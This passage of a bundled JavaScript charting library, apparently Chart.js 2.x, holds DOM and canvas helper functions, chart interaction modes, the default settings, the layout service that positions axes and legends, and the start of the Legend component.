var width = boundingRect.right - boundingRect.left - paddingLeft - paddingRight;
var height = boundingRect.bottom - boundingRect.top - paddingTop - paddingBottom;
// We divide by the current device pixel ratio, because the canvas is scaled up by that amount in each direction. However
// the backend model is in unscaled coordinates. Since we are going to deal with our model coordinates, we go back here
mouseX = Math.round((mouseX - boundingRect.left - paddingLeft) / (width) * canvas.width / chart.currentDevicePixelRatio);
mouseY = Math.round((mouseY - boundingRect.top - paddingTop) / (height) * canvas.height / chart.currentDevicePixelRatio);
return {
x: mouseX,
y: mouseY
};
};
helpers.addEvent = function (node, eventType, method) {
if (node.addEventListener) {
node.addEventListener(eventType, method);
} else if (node.attachEvent) {
node.attachEvent('on' + eventType, method);
} else {
node['on' + eventType] = method;
}
};
helpers.removeEvent = function (node, eventType, handler) {
if (node.removeEventListener) {
node.removeEventListener(eventType, handler, false);
} else if (node.detachEvent) {
node.detachEvent('on' + eventType, handler);
} else {
node['on' + eventType] = helpers.noop;
}
};
helpers.bindEvents = function (chartInstance, arrayOfEvents, handler) {
// Create the events object if it's not already present
var events = chartInstance.events = chartInstance.events || {};
helpers.each(arrayOfEvents, function (eventName) {
events[eventName] = function () {
handler.apply(chartInstance, arguments);
};
helpers.addEvent(chartInstance.chart.canvas, eventName, events[eventName]);
});
};
helpers.unbindEvents = function (chartInstance, arrayOfEvents) {
var canvas = chartInstance.chart.canvas;
helpers.each(arrayOfEvents, function (handler, eventName) {
helpers.removeEvent(canvas, eventName, handler);
});
};
// Private helper function to convert max-width/max-height values that may be percentages into a number
function parseMaxStyle(styleValue, node, parentProperty) {
var valueInPixels;
if (typeof(styleValue) === 'string') {
valueInPixels = parseInt(styleValue, 10);
if (styleValue.indexOf('%') !== -1) {
// percentage * size in dimension
valueInPixels = valueInPixels / 100 * node.parentNode[parentProperty];
}
} else {
valueInPixels = styleValue;
}
return valueInPixels;
}
/**
* Returns if the given value contains an effective constraint.
* @private
*/
function isConstrainedValue(value) {
return value !== undefined && value !== null && value !== 'none';
}
// Private helper to get a constraint dimension
// @param domNode : the node to check the constraint on
// @param maxStyle : the style that defines the maximum for the direction we are using (maxWidth / maxHeight)
// @param percentageProperty : property of parent to use when calculating width as a percentage
// @see http://www.nathanaeljones.com/blog/2013/reading-max-width-cross-browser
function getConstraintDimension(domNode, maxStyle, percentageProperty) {
var view = document.defaultView;
var parentNode = domNode.parentNode;
var constrainedNode = view.getComputedStyle(domNode)[maxStyle];
var constrainedContainer = view.getComputedStyle(parentNode)[maxStyle];
var hasCNode = isConstrainedValue(constrainedNode);
var hasCContainer = isConstrainedValue(constrainedContainer);
var infinity = Number.POSITIVE_INFINITY;
if (hasCNode || hasCContainer) {
return Math.min(
hasCNode ? parseMaxStyle(constrainedNode, domNode, percentageProperty) : infinity,
hasCContainer ? parseMaxStyle(constrainedContainer, parentNode, percentageProperty) : infinity);
}
return 'none';
}
// returns Number, or 'none' if no constraint
helpers.getConstraintWidth = function (domNode) {
return getConstraintDimension(domNode, 'max-width', 'clientWidth');
};
// returns Number, or 'none' if no constraint
helpers.getConstraintHeight = function (domNode) {
return getConstraintDimension(domNode, 'max-height', 'clientHeight');
};
helpers.getMaximumWidth = function (domNode) {
var container = domNode.parentNode;
var paddingLeft = parseInt(helpers.getStyle(container, 'padding-left'), 10);
var paddingRight = parseInt(helpers.getStyle(container, 'padding-right'), 10);
var w = container.clientWidth - paddingLeft - paddingRight;
var cw = helpers.getConstraintWidth(domNode);
return isNaN(cw) ? w : Math.min(w, cw);
};
helpers.getMaximumHeight = function (domNode) {
var container = domNode.parentNode;
var paddingTop = parseInt(helpers.getStyle(container, 'padding-top'), 10);
var paddingBottom = parseInt(helpers.getStyle(container, 'padding-bottom'), 10);
var h = container.clientHeight - paddingTop - paddingBottom;
var ch = helpers.getConstraintHeight(domNode);
return isNaN(ch) ? h : Math.min(h, ch);
};
helpers.getStyle = function (el, property) {
return el.currentStyle ?
el.currentStyle[property] :
document.defaultView.getComputedStyle(el, null).getPropertyValue(property);
};
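// Scale the canvas backing store by devicePixelRatio so charts stay sharp on HiDPI displays
// while the CSS size stays fixed.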
helpers.retinaScale = function (chart) {
var pixelRatio = chart.currentDevicePixelRatio = window.devicePixelRatio || 1;
if (pixelRatio === 1) {
return;
}
var canvas = chart.canvas;
var height = chart.height;
var width = chart.width;
canvas.height = height * pixelRatio;
canvas.width = width * pixelRatio;
chart.ctx.scale(pixelRatio, pixelRatio);
// If no style has been set on the canvas, the render size is used as display size,
// making the chart visually bigger, so let's enforce it to the "correct" values.
// See https://github.com/chartjs/Chart.js/issues/3575
canvas.style.height = height + 'px';
canvas.style.width = width + 'px';
};
// -- Canvas methods
helpers.clear = function (chart) {
chart.ctx.clearRect(0, 0, chart.width, chart.height);
};
helpers.fontString = function (pixelSize, fontStyle, fontFamily) {
return fontStyle + ' ' + pixelSize + 'px ' + fontFamily;
};
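// Measure the widest entry in arrayOfThings (one level of nested arrays is flattened),
// memoizing widths per font in cache and pruning stale entries.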
helpers.longestText = function (ctx, font, arrayOfThings, cache) {
cache = cache || {};
var data = cache.data = cache.data || {};
var gc = cache.garbageCollect = cache.garbageCollect || [];
if (cache.font !== font) {
data = cache.data = {};
gc = cache.garbageCollect = [];
cache.font = font;
}
ctx.font = font;
var longest = 0;
helpers.each(arrayOfThings, function (thing) {
// Undefined strings and arrays should not be measured
if (thing !== undefined && thing !== null && helpers.isArray(thing) !== true) {
longest = helpers.measureText(ctx, data, gc, longest, thing);
} else if (helpers.isArray(thing)) {
// if it is an array lets measure each element
// TODO: maybe simplify this function a bit so we can do this more recursively?
helpers.each(thing, function (nestedThing) {
// Undefined strings and arrays should not be measured
if (nestedThing !== undefined && nestedThing !== null && !helpers.isArray(nestedThing)) {
longest = helpers.measureText(ctx, data, gc, longest, nestedThing);
}
});
}
});
var gcLen = gc.length / 2;
if (gcLen > arrayOfThings.length) {
for (var i = 0; i < gcLen; i++) {
delete data[gc[i]];
}
gc.splice(0, gcLen);
}
return longest;
};
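// Measure string once, memoize its width in data, and return the running maximum.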
helpers.measureText = function (ctx, data, gc, longest, string) {
var textWidth = data[string];
if (!textWidth) {
textWidth = data[string] = ctx.measureText(string).width;
gc.push(string);
}
if (textWidth > longest) {
longest = textWidth;
}
return longest;
};
helpers.numberOfLabelLines = function (arrayOfThings) {
var numberOfLines = 1;
helpers.each(arrayOfThings, function (thing) {
if (helpers.isArray(thing)) {
if (thing.length > numberOfLines) {
numberOfLines = thing.length;
}
}
});
return numberOfLines;
};
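// Trace a rounded-rectangle path using quadratic corner curves; the caller fills or strokes it.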
helpers.drawRoundedRectangle = function (ctx, x, y, width, height, radius) {
ctx.beginPath();
ctx.moveTo(x + radius, y);
ctx.lineTo(x + width - radius, y);
ctx.quadraticCurveTo(x + width, y, x + width, y + radius);
ctx.lineTo(x + width, y + height - radius);
ctx.quadraticCurveTo(x + width, y + height, x + width - radius, y + height);
ctx.lineTo(x + radius, y + height);
ctx.quadraticCurveTo(x, y + height, x, y + height - radius);
ctx.lineTo(x, y + radius);
ctx.quadraticCurveTo(x, y, x + radius, y);
ctx.closePath();
};
helpers.color = function (c) {
if (!color) {
console.error('Color.js not found!');
return c;
}
/* global CanvasGradient */
if (c instanceof CanvasGradient) {
return color(Chart.defaults.global.defaultColor);
}
return color(c);
};
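// Detect element resizes by overlaying a hidden, full-size iframe and listening to its
// contentWindow's resize event (a pre-ResizeObserver technique).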
helpers.addResizeListener = function (node, callback) {
var iframe = document.createElement('iframe');
iframe.className = 'chartjs-hidden-iframe';
iframe.style.cssText =
'display:block;' +
'overflow:hidden;' +
'border:0;' +
'margin:0;' +
'top:0;' +
'left:0;' +
'bottom:0;' +
'right:0;' +
'height:100%;' +
'width:100%;' +
'position:absolute;' +
'pointer-events:none;' +
'z-index:-1;';
// Prevent the iframe from gaining focus on tab.
// https://github.com/chartjs/Chart.js/issues/3090
iframe.tabIndex = -1;
// Let's keep track of this added iframe and thus avoid DOM query when removing it.
var stub = node._chartjs = {
resizer: iframe,
ticking: false
};
// Throttle the callback notification until the next animation frame.
var notify = function () {
if (!stub.ticking) {
stub.ticking = true;
helpers.requestAnimFrame.call(window, function () {
if (stub.resizer) {
stub.ticking = false;
return callback();
}
});
}
};
// If the iframe is re-attached to the DOM, the resize listener is removed because the
// content is reloaded, so make sure to install the handler after the iframe is loaded.
// https://github.com/chartjs/Chart.js/issues/3521
helpers.addEvent(iframe, 'load', function () {
helpers.addEvent(iframe.contentWindow || iframe, 'resize', notify);
// The iframe size might have changed while loading, which can also
// happen if the size has been changed while detached from the DOM.
notify();
});
node.insertBefore(iframe, node.firstChild);
};
helpers.removeResizeListener = function (node) {
if (!node || !node._chartjs) {
return;
}
var iframe = node._chartjs.resizer;
if (iframe) {
iframe.parentNode.removeChild(iframe);
node._chartjs.resizer = null;
}
delete node._chartjs;
};
helpers.isArray = Array.isArray ?
function (obj) {
return Array.isArray(obj);
} :
function (obj) {
return Object.prototype.toString.call(obj) === '[object Array]';
};
// ! @see http://stackoverflow.com/a/14853974
helpers.arrayEquals = function (a0, a1) {
var i, ilen, v0, v1;
if (!a0 || !a1 || a0.length !== a1.length) {
return false;
}
for (i = 0, ilen = a0.length; i < ilen; ++i) {
v0 = a0[i];
v1 = a1[i];
if (v0 instanceof Array && v1 instanceof Array) {
if (!helpers.arrayEquals(v0, v1)) {
return false;
}
} else if (v0 !== v1) {
// NOTE: two different object instances will never be equal: {x:20} != {x:20}
return false;
}
}
return true;
};
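// Invoke fn with args and _tArg as this, silently ignoring non-callable values.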
helpers.callCallback = function (fn, args, _tArg) {
if (fn && typeof fn.call === 'function') {
fn.apply(_tArg, args);
}
};
helpers.getHoverColor = function (colorValue) {
/* global CanvasPattern */
return (colorValue instanceof CanvasPattern) ?
colorValue :
helpers.color(colorValue).saturate(0.5).darken(0.1).rgbString();
};
};
}, {"3": 3}], 27: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Helper function to traverse all of the visible elements in the chart
* @param chart {chart} the chart
* @param handler {Function} the callback to execute for each visible item
*/
function parseVisibleItems(chart, handler) {
var datasets = chart.data.datasets;
var meta, i, j, ilen, jlen;
for (i = 0, ilen = datasets.length; i < ilen; ++i) {
if (!chart.isDatasetVisible(i)) {
continue;
}
meta = chart.getDatasetMeta(i);
for (j = 0, jlen = meta.data.length; j < jlen; ++j) {
var element = meta.data[j];
if (!element._view.skip) {
handler(element);
}
}
}
}
/**
* Helper function to get the items that intersect the event position
* @param chart {chart} the chart to look at elements from
* @param position {Point} the point to check for intersections
* @return {ChartElement[]} the intersecting items
*/
function getIntersectItems(chart, position) {
var elements = [];
parseVisibleItems(chart, function (element) {
if (element.inRange(position.x, position.y)) {
elements.push(element);
}
});
return elements;
}
/**
* Helper function to get the items nearest to the event position considering all visible items in the chart
* @param chart {Chart} the chart to look at elements from
* @param position {Point} the point to be nearest to
* @param intersect {Boolean} if true, only consider items that intersect the position
* @param distanceMetric {Function} Optional function to provide the distance between two points
* @return {ChartElement[]} the nearest items
*/
function getNearestItems(chart, position, intersect, distanceMetric) {
var minDistance = Number.POSITIVE_INFINITY;
var nearestItems = [];
if (!distanceMetric) {
distanceMetric = helpers.distanceBetweenPoints;
}
parseVisibleItems(chart, function (element) {
if (intersect && !element.inRange(position.x, position.y)) {
return;
}
var center = element.getCenterPoint();
var distance = distanceMetric(position, center);
if (distance < minDistance) {
nearestItems = [element];
minDistance = distance;
} else if (distance === minDistance) {
// Can have multiple items at the same distance in which case we sort by size
nearestItems.push(element);
}
});
return nearestItems;
}
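// Shared implementation of the 'index' (and deprecated 'label') modes: locate the item hit at the
// event's x position, then collect the element at that same index from every visible dataset.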
function indexMode(chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var distanceMetric = function (pt1, pt2) {
return Math.abs(pt1.x - pt2.x);
};
var items = options.intersect ? getIntersectItems(chart, position) : getNearestItems(chart, position, false, distanceMetric);
var elements = [];
if (!items.length) {
return [];
}
chart.data.datasets.forEach(function (dataset, datasetIndex) {
if (chart.isDatasetVisible(datasetIndex)) {
var meta = chart.getDatasetMeta(datasetIndex),
element = meta.data[items[0]._index];
// don't count items that are skipped (null data)
if (element && !element._view.skip) {
elements.push(element);
}
}
});
return elements;
}
/**
* @interface IInteractionOptions
*/
/**
* If true, only consider items that intersect the point
* @name IInteractionOptions#intersect
* @type Boolean
*/
/**
* @namespace Chart.Interaction
* Contains interaction related functions
*/
Chart.Interaction = {
// Helper function for different modes
modes: {
single: function (chart, e) {
var position = helpers.getRelativePosition(e, chart.chart);
var elements = [];
parseVisibleItems(chart, function (element) {
if (element.inRange(position.x, position.y)) {
elements.push(element);
return elements;
}
});
return elements.slice(0, 1);
},
/**
* @function Chart.Interaction.modes.label
* @deprecated since version 2.4.0
*/
label: indexMode,
/**
* Returns items at the same index. If the options.intersect parameter is true, we only return items if we intersect something
* If the options.intersect mode is false, we find the nearest item and return the items at the same index as that item
* @function Chart.Interaction.modes.index
* @since v2.4.0
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @param options {IInteractionOptions} options to use during interaction
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
index: indexMode,
/**
* Returns items in the same dataset. If the options.intersect parameter is true, we only return items if we intersect something
* If the options.intersect is false, we find the nearest item and return the items in that dataset
* @function Chart.Interaction.modes.dataset
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @param options {IInteractionOptions} options to use during interaction
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
dataset: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = options.intersect ? getIntersectItems(chart, position) : getNearestItems(chart, position, false);
if (items.length > 0) {
items = chart.getDatasetMeta(items[0]._datasetIndex).data;
}
return items;
},
/**
* @function Chart.Interaction.modes.x-axis
* @deprecated since version 2.4.0. Use index mode and intersect == true
*/
'x-axis': function (chart, e) {
// indexMode reads options.intersect; the legacy x-axis mode did not require intersection,
// so pass an options object rather than a bare boolean
return indexMode(chart, e, {intersect: false});
},
/**
* Point mode returns all elements that intersect the event position
* @function Chart.Interaction.modes.point
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
point: function (chart, e) {
var position = helpers.getRelativePosition(e, chart.chart);
return getIntersectItems(chart, position);
},
/**
* nearest mode returns the element closest to the point
* @function Chart.Interaction.modes.nearest
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
nearest: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var nearestItems = getNearestItems(chart, position, options.intersect);
// Multiple items may be at the same distance from the event; sort by smallest area
if (nearestItems.length > 1) {
nearestItems.sort(function (a, b) {
var sizeA = a.getArea();
var sizeB = b.getArea();
var ret = sizeA - sizeB;
if (ret === 0) {
// if equal sort by dataset index
ret = a._datasetIndex - b._datasetIndex;
}
return ret;
});
}
// Return only 1 item
return nearestItems.slice(0, 1);
},
/**
* x mode returns the elements that hit-test at the current x coordinate
* @function Chart.Interaction.modes.x
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
x: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = [];
var intersectsItem = false;
parseVisibleItems(chart, function (element) {
if (element.inXRange(position.x)) {
items.push(element);
}
if (element.inRange(position.x, position.y)) {
intersectsItem = true;
}
});
// If we want to trigger on an intersect and we don't have any items
// that intersect the position, return nothing
if (options.intersect && !intersectsItem) {
items = [];
}
return items;
},
/**
* y mode returns the elements that hit-test at the current y coordinate
* @function Chart.Interaction.modes.y
* @param chart {chart} the chart we are returning items from
* @param e {Event} the event we are finding things at
* @param options {IInteractionOptions} options to use
* @return {Chart.Element[]} Array of elements that are under the point. If none are found, an empty array is returned
*/
y: function (chart, e, options) {
var position = helpers.getRelativePosition(e, chart.chart);
var items = [];
var intersectsItem = false;
parseVisibleItems(chart, function (element) {
if (element.inYRange(position.y)) {
items.push(element);
}
if (element.inRange(position.x, position.y)) {
intersectsItem = true;
}
});
// If we want to trigger on an intersect and we don't have any items
// that intersect the position, return nothing
if (options.intersect && !intersectsItem) {
items = [];
}
return items;
}
}
};
};
}, {}], 28: [function (require, module, exports) {
'use strict';
module.exports = function () {
// Take over the global Chart variable and create a simple base class
var Chart = function (item, config) {
this.controller = new Chart.Controller(item, config, this);
return this.controller;
};
// Globally expose the defaults to allow for user updating/changing
Chart.defaults = {
global: {
responsive: true,
responsiveAnimationDuration: 0,
maintainAspectRatio: true,
events: ['mousemove', 'mouseout', 'click', 'touchstart', 'touchmove'],
hover: {
onHover: null,
mode: 'nearest',
intersect: true,
animationDuration: 400
},
onClick: null,
defaultColor: 'rgba(0,0,0,0.1)',
defaultFontColor: '#666',
defaultFontFamily: "'Helvetica Neue', 'Helvetica', 'Arial', sans-serif",
defaultFontSize: 12,
defaultFontStyle: 'normal',
showLines: true,
// Element defaults defined in element extensions
elements: {},
// Legend callback string
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
for (var i = 0; i < chart.data.datasets.length; i++) {
text.push('<li><span style="background-color:' + chart.data.datasets[i].backgroundColor + '"></span>');
if (chart.data.datasets[i].label) {
text.push(chart.data.datasets[i].label);
}
text.push('</li>');
}
text.push('</ul>');
return text.join('');
}
}
};
Chart.Chart = Chart;
return Chart;
};
}, {}], 29: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// The layout service is very self explanatory. It's responsible for the layout within a chart.
// Scales, Legends and Plugins all rely on the layout service and can easily register to be placed anywhere they need
// It is this service's responsibility to carry out that layout.
Chart.layoutService = {
defaults: {},
// Register a box to a chartInstance. A box is simply a reference to an object that requires layout, e.g. scales, legends, plugins.
addBox: function (chartInstance, box) {
if (!chartInstance.boxes) {
chartInstance.boxes = [];
}
chartInstance.boxes.push(box);
},
removeBox: function (chartInstance, box) {
if (!chartInstance.boxes) {
return;
}
chartInstance.boxes.splice(chartInstance.boxes.indexOf(box), 1);
},
// The most important function
update: function (chartInstance, width, height) {
if (!chartInstance) {
return;
}
var layoutOptions = chartInstance.options.layout;
var padding = layoutOptions ? layoutOptions.padding : null;
var leftPadding = 0;
var rightPadding = 0;
var topPadding = 0;
var bottomPadding = 0;
if (!isNaN(padding)) {
// options.layout.padding is a number. assign to all
leftPadding = padding;
rightPadding = padding;
topPadding = padding;
bottomPadding = padding;
} else {
leftPadding = padding.left || 0;
rightPadding = padding.right || 0;
topPadding = padding.top || 0;
bottomPadding = padding.bottom || 0;
}
var leftBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'left';
});
var rightBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'right';
});
var topBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'top';
});
var bottomBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'bottom';
});
// Boxes that overlay the chartarea such as the radialLinear scale
var chartAreaBoxes = helpers.where(chartInstance.boxes, function (box) {
return box.options.position === 'chartArea';
});
// Ensure that full width boxes are at the very top / bottom
topBoxes.sort(function (a, b) {
return (b.options.fullWidth ? 1 : 0) - (a.options.fullWidth ? 1 : 0);
});
bottomBoxes.sort(function (a, b) {
return (a.options.fullWidth ? 1 : 0) - (b.options.fullWidth ? 1 : 0);
});
// Essentially we now have any number of boxes on each of the 4 sides.
// Our canvas looks like the following.
// The areas L1 and L2 are the left axes. R1 is the right axis, T1 is the top axis and
// B1 is the bottom axis
// There are also 4 quadrant-like locations (left to right instead of clockwise) reserved for chart overlays
// These locations are single-box locations only, when trying to register a chartArea location that is already taken,
// an error will be thrown.
//
// |----------------------------------------------------|
// | T1 (Full Width) |
// |----------------------------------------------------|
// | | | T2 | |
// | |----|-------------------------------------|----|
// | | | C1 | | C2 | |
// | | |----| |----| |
// | | | | |
// | L1 | L2 | ChartArea (C0) | R1 |
// | | | | |
// | | |----| |----| |
// | | | C3 | | C4 | |
// | |----|-------------------------------------|----|
// | | | B1 | |
// |----------------------------------------------------|
// | B2 (Full Width) |
// |----------------------------------------------------|
//
// What we do to find the best sizing, we do the following
// 1. Determine the minimum size of the chart area.
// 2. Split the remaining width equally between each vertical axis
// 3. Split the remaining height equally between each horizontal axis
// 4. Give each layout the maximum size it can be. The layout will return its minimum size
// 5. Adjust the sizes of each axis based on its minimum reported size.
// 6. Refit each axis
// 7. Position each axis in the final location
// 8. Tell the chart the final location of the chart area
// 9. Tell any axes that overlay the chart area the positions of the chart area
// Step 1
var chartWidth = width - leftPadding - rightPadding;
var chartHeight = height - topPadding - bottomPadding;
var chartAreaWidth = chartWidth / 2; // min 50%
var chartAreaHeight = chartHeight / 2; // min 50%
// Step 2
var verticalBoxWidth = (width - chartAreaWidth) / (leftBoxes.length + rightBoxes.length);
// Step 3
var horizontalBoxHeight = (height - chartAreaHeight) / (topBoxes.length + bottomBoxes.length);
// Step 4
var maxChartAreaWidth = chartWidth;
var maxChartAreaHeight = chartHeight;
var minBoxSizes = [];
function getMinimumBoxSize(box) {
var minSize;
var isHorizontal = box.isHorizontal();
if (isHorizontal) {
minSize = box.update(box.options.fullWidth ? chartWidth : maxChartAreaWidth, horizontalBoxHeight);
maxChartAreaHeight -= minSize.height;
} else {
minSize = box.update(verticalBoxWidth, chartAreaHeight);
maxChartAreaWidth -= minSize.width;
}
minBoxSizes.push({
horizontal: isHorizontal,
minSize: minSize,
box: box
});
}
helpers.each(leftBoxes.concat(rightBoxes, topBoxes, bottomBoxes), getMinimumBoxSize);
// At this point, maxChartAreaHeight and maxChartAreaWidth are the size the chart area could
// be if the axes are drawn at their minimum sizes.
// Steps 5 & 6
var totalLeftBoxesWidth = leftPadding;
var totalRightBoxesWidth = rightPadding;
var totalTopBoxesHeight = topPadding;
var totalBottomBoxesHeight = bottomPadding;
// Function to fit a box
function fitBox(box) {
var minBoxSize = helpers.findNextWhere(minBoxSizes, function (minBox) {
return minBox.box === box;
});
if (minBoxSize) {
if (box.isHorizontal()) {
var scaleMargin = {
left: totalLeftBoxesWidth,
right: totalRightBoxesWidth,
top: 0,
bottom: 0
};
// Don't use min size here because of label rotation. When the labels are rotated, their rotation highly depends
// on the margin. Sometimes they need to increase in size slightly
box.update(box.options.fullWidth ? chartWidth : maxChartAreaWidth, chartHeight / 2, scaleMargin);
} else {
box.update(minBoxSize.minSize.width, maxChartAreaHeight);
}
}
}
// Fit the vertical boxes first, accumulating the left and right margins needed by the horizontal boxes
helpers.each(leftBoxes.concat(rightBoxes), fitBox);
helpers.each(leftBoxes, function (box) {
totalLeftBoxesWidth += box.width;
});
helpers.each(rightBoxes, function (box) {
totalRightBoxesWidth += box.width;
});
// Now fit the horizontal boxes using the left and right margins computed above
helpers.each(topBoxes.concat(bottomBoxes), fitBox);
// Figure out how much margin is on the top and bottom of the vertical boxes
helpers.each(topBoxes, function (box) {
totalTopBoxesHeight += box.height;
});
helpers.each(bottomBoxes, function (box) {
totalBottomBoxesHeight += box.height;
});
function finalFitVerticalBox(box) {
var minBoxSize = helpers.findNextWhere(minBoxSizes, function (minSize) {
return minSize.box === box;
});
var scaleMargin = {
left: 0,
right: 0,
top: totalTopBoxesHeight,
bottom: totalBottomBoxesHeight
};
if (minBoxSize) {
box.update(minBoxSize.minSize.width, maxChartAreaHeight, scaleMargin);
}
}
// Let the vertical layouts know the final top and bottom margins
helpers.each(leftBoxes.concat(rightBoxes), finalFitVerticalBox);
// Recalculate because the size of each layout might have changed slightly due to the margins (label rotation for instance)
totalLeftBoxesWidth = leftPadding;
totalRightBoxesWidth = rightPadding;
totalTopBoxesHeight = topPadding;
totalBottomBoxesHeight = bottomPadding;
helpers.each(leftBoxes, function (box) {
totalLeftBoxesWidth += box.width;
});
helpers.each(rightBoxes, function (box) {
totalRightBoxesWidth += box.width;
});
helpers.each(topBoxes, function (box) {
totalTopBoxesHeight += box.height;
});
helpers.each(bottomBoxes, function (box) {
totalBottomBoxesHeight += box.height;
});
// Figure out if our chart area changed. This would occur if the dataset layout label rotation
// changed due to the application of the margins in step 6. Since we can only get bigger, this is safe to do
// without calling `fit` again
var newMaxChartAreaHeight = height - totalTopBoxesHeight - totalBottomBoxesHeight;
var newMaxChartAreaWidth = width - totalLeftBoxesWidth - totalRightBoxesWidth;
if (newMaxChartAreaWidth !== maxChartAreaWidth || newMaxChartAreaHeight !== maxChartAreaHeight) {
helpers.each(leftBoxes, function (box) {
box.height = newMaxChartAreaHeight;
});
helpers.each(rightBoxes, function (box) {
box.height = newMaxChartAreaHeight;
});
helpers.each(topBoxes, function (box) {
if (!box.options.fullWidth) {
box.width = newMaxChartAreaWidth;
}
});
helpers.each(bottomBoxes, function (box) {
if (!box.options.fullWidth) {
box.width = newMaxChartAreaWidth;
}
});
maxChartAreaHeight = newMaxChartAreaHeight;
maxChartAreaWidth = newMaxChartAreaWidth;
}
// Step 7 - Position the boxes
var left = leftPadding;
var top = topPadding;
function placeBox(box) {
if (box.isHorizontal()) {
box.left = box.options.fullWidth ? leftPadding : totalLeftBoxesWidth;
box.right = box.options.fullWidth ? width - rightPadding : totalLeftBoxesWidth + maxChartAreaWidth;
box.top = top;
box.bottom = top + box.height;
// Move to next point
top = box.bottom;
} else {
box.left = left;
box.right = left + box.width;
box.top = totalTopBoxesHeight;
box.bottom = totalTopBoxesHeight + maxChartAreaHeight;
// Move to next point
left = box.right;
}
}
helpers.each(leftBoxes.concat(topBoxes), placeBox);
// Account for chart width and height
left += maxChartAreaWidth;
top += maxChartAreaHeight;
helpers.each(rightBoxes, placeBox);
helpers.each(bottomBoxes, placeBox);
// Step 8
chartInstance.chartArea = {
left: totalLeftBoxesWidth,
top: totalTopBoxesHeight,
right: totalLeftBoxesWidth + maxChartAreaWidth,
bottom: totalTopBoxesHeight + maxChartAreaHeight
};
// Step 9
helpers.each(chartAreaBoxes, function (box) {
box.left = chartInstance.chartArea.left;
box.top = chartInstance.chartArea.top;
box.right = chartInstance.chartArea.right;
box.bottom = chartInstance.chartArea.bottom;
box.update(maxChartAreaWidth, maxChartAreaHeight);
});
}
};
};
}, {}], 30: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var noop = helpers.noop;
Chart.defaults.global.legend = {
display: true,
position: 'top',
fullWidth: true, // marks that this box should take the full width of the canvas (pushing down other boxes)
reverse: false,
// a callback that will handle clicks on a legend item
onClick: function (e, legendItem) {
var index = legendItem.datasetIndex;
var ci = this.chart;
var meta = ci.getDatasetMeta(index);
// See controller.isDatasetVisible comment
meta.hidden = meta.hidden === null ? !ci.data.datasets[index].hidden : null;
// We hid a dataset ... rerender the chart
ci.update();
},
onHover: null,
labels: {
boxWidth: 40,
padding: 10,
// Generates labels shown in the legend
// Valid properties to return:
// text : text to display
// fillStyle : fill of coloured box
// strokeStyle: stroke of coloured box
// hidden : if this legend item refers to a hidden item
// lineCap : cap style for line
// lineDash
// lineDashOffset :
// lineJoin :
// lineWidth :
generateLabels: function (chart) {
var data = chart.data;
return helpers.isArray(data.datasets) ? data.datasets.map(function (dataset, i) {
return {
text: dataset.label,
fillStyle: (!helpers.isArray(dataset.backgroundColor) ? dataset.backgroundColor : dataset.backgroundColor[0]),
hidden: !chart.isDatasetVisible(i),
lineCap: dataset.borderCapStyle,
lineDash: dataset.borderDash,
lineDashOffset: dataset.borderDashOffset,
lineJoin: dataset.borderJoinStyle,
lineWidth: dataset.borderWidth,
strokeStyle: dataset.borderColor,
pointStyle: dataset.pointStyle,
// Below is extra data used for toggling the datasets
datasetIndex: i
};
}, this) : [];
}
}
};
/**
* Helper function to get the box width based on the usePointStyle option
* @param labelopts {Object} the label options on the legend
* @param fontSize {Number} the label font size
* @return {Number} width of the color box area
*/
function getBoxWidth(labelOpts, fontSize) {
return labelOpts.usePointStyle ?
fontSize * Math.SQRT2 :
labelOpts.boxWidth;
}
Chart.Legend = Chart.Element.extend({
initialize: function (config) {
helpers.extend(this, config);
// Contains hit boxes for each dataset (in dataset order)
this.legendHitBoxes = [];
// Are we in doughnut mode which has a different data type
this.doughnutMode = false;
},
// These methods are ordered by lifecycle. Utilities then follow.
// Any function defined here is inherited by all legend types.
// Any function can be extended by the legend type
beforeUpdate: noop,
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = margins;
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Labels
me.beforeBuildLabels();
me.buildLabels();
me.afterBuildLabels();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: noop,
//
beforeSetDimensions: noop,
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
// Reset minSize
me.minSize = {
width: 0,
height: 0
};
},
afterSetDimensions: noop,
//
beforeBuildLabels: noop,
buildLabels: function () {
var me = this;
me.legendItems = me.options.labels.generateLabels.call(me, me.chart);
if (me.options.reverse) {
me.legendItems.reverse();
}
},
